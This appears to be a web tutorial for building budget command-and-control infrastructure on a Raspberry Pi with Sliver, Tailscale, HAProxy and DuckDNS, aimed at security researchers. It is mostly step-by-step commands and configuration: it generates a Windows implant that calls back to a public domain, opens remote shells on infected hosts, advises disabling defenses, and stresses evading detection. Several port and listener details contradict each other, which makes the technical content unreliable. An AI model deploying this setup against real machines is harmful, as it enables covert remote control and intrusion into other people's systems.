Back to Home

C2 on Raspberry Pi: budget build in an evening | Cybersecurity

Guide to creating budget C2 infrastructure based on Raspberry Pi 4 using Sliver, Tailscale, and HAProxy. Detailed component setup, cost optimization, and operation recommendations. Solution aimed at researchers in cybersecurity.

How to assemble a C2 server on Raspberry Pi for 4 euros per month
Advertisement 728x90

Budget C2 Infrastructure on Raspberry Pi: Step-by-Step Setup in an Evening

Building command-and-control (C2) infrastructure for cybersecurity research is often associated with expensive commercial solutions. This guide walks through implementing a fully functional C2 system on a Raspberry Pi 4 using open-source software. The emphasis is on keeping costs low while preserving essential features: encrypted traffic, dynamic DNS, and stealth against detection. This material is for educational purposes only, within the scope of ethical hacking.

Layout of the Budget C2 System

You'll need the following for the build:

  • Raspberry Pi 4 (4 GB RAM) — main implant server
  • 32 GB SD card
  • VPS with 2 GB RAM (from 4 €/month) for the public endpoint
  • Tailscale — for secure tunneling between components
  • Sliver v1.7.3 — open-source alternative to Cobalt Strike
  • DuckDNS — dynamic DNS service

The system architecture follows this flow: implant → duckdns.org:443 → VPS (HAProxy) → Tailscale → Raspberry Pi (Sliver:31337). This setup hides the Pi's real IP behind a public domain and encrypts traffic at every hop.

Google AdInline article slot

Setting Up the Secure Tunnel with Tailscale

Install Tailscale on both the Raspberry Pi and VPS the same way. Run in the terminal:

curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up

After browser-based authentication, the system assigns each node a unique Tailscale IP (e.g., Pi: 100.92.XX.XXX, VPS: 100.106.XXX.XX). Test connectivity between nodes:

ping 100.92.XXX.XXX

Key point: traffic between components is end-to-end encrypted, preventing interception at intermediate nodes. Tailscale automatically handles route updates if IPs change, which is crucial for connection stability.

Google AdInline article slot

Deploying Sliver on Raspberry Pi

Download the Sliver binary for ARM64:

cd /tmp
wget https://github.com/BishopFox/sliver/releases/download/v1.7.3/sliver-server_linux_arm64
sudo install -m 755 sliver-server_linux_arm64 /usr/local/bin/sliver-server

Launch the server as a daemon, allowing connections from any interface:

sliver-server daemon --lhost 0.0.0.0 --lport 31338

The implant listener runs on port 31337. For management, use the Sliver console: sliver-server console. Make sure port 31337 is open in the Raspberry Pi firewall.

Google AdInline article slot

Configuring HAProxy on the VPS

Install HAProxy on the virtual server:

sudo apt install -y haproxy

Edit the config file /etc/haproxy/haproxy.cfg:

global
    log /dev/log local0
    maxconn 10000

defaults
    mode tcp
    timeout connect 5s
    timeout client 60s
    timeout server 60s

frontend sliver_frontend
    bind :443
    default_backend sliver_backend

backend sliver_backend
    server pi4 100.92.XXX.XXX:31337 check

Restart the service:

sudo systemctl enable haproxy
sudo systemctl start haproxy

HAProxy acts as a TLS terminator, forwarding traffic from port 443 to the internal Raspberry Pi address via Tailscale. Verify it's working: openssl s_client -connect your-domain.duckdns.org:443.

Integrating Dynamic DNS

Register a domain on DuckDNS and point it to the VPS public IP. For automatic IP updates, add an update script to cron. Check domain resolution:

dig your-domain.duckdns.org

This step is vital for connection stability when the VPS external IP changes. DuckDNS ensures the domain always resolves to the current server address.

Generating and Testing the Implant

In the Sliver console, create an HTTP listener:

http --domain your-domain.duckdns.org --lhost 0.0.0.0 --lport 31337

Generate a Windows implant with mTLS authentication:

generate --mtls your-domain.duckdns.org:443 --format exe --os windows --save /tmp/sliver.exe

Transfer the file to a test Windows 10 system (disable defenses for demo purposes). Once the implant runs, a session appears in the Sliver console:

[*] Session c5360843 UNIFORM_DISGUST - 100.106.xxx.xx:48190 (win10) - windows/amd64

Connect to the session:

sessions -i c5360843
shell

Testing confirms connection resilience: sessions survive implant restarts or network changes.

Optimization and Operation

For better reliability, we recommend:

  • Set up Sliver to auto-start via systemd
  • Add HAProxy log monitoring
  • Use separate domains for different listeners
  • Regularly renew Let's Encrypt certificates

Key commands for day-to-day management:

# Starting Sliver
sliver-server daemon --lhost 0.0.0.0 --lport 31338

# Viewing active sessions
sessions

# Entering interactive shell
sessions -i <ID>
shell

The system supports implant management via the Tailscale mobile app, giving you access from anywhere in the world.

Key Takeaways

  • Dual encryption architecture (TLS + Tailscale) minimizes traffic detection risk
  • Monthly costs are limited to the VPS (from 4 €); all other software is open-source
  • Raspberry Pi 4 handles up to 50 concurrent sessions comfortably
  • DuckDNS integration solves dynamic IP issues at no extra cost
  • Sliver fully replaces commercial tools with basic networking knowledge

— Editorial Team

Advertisement 728x90

Read Next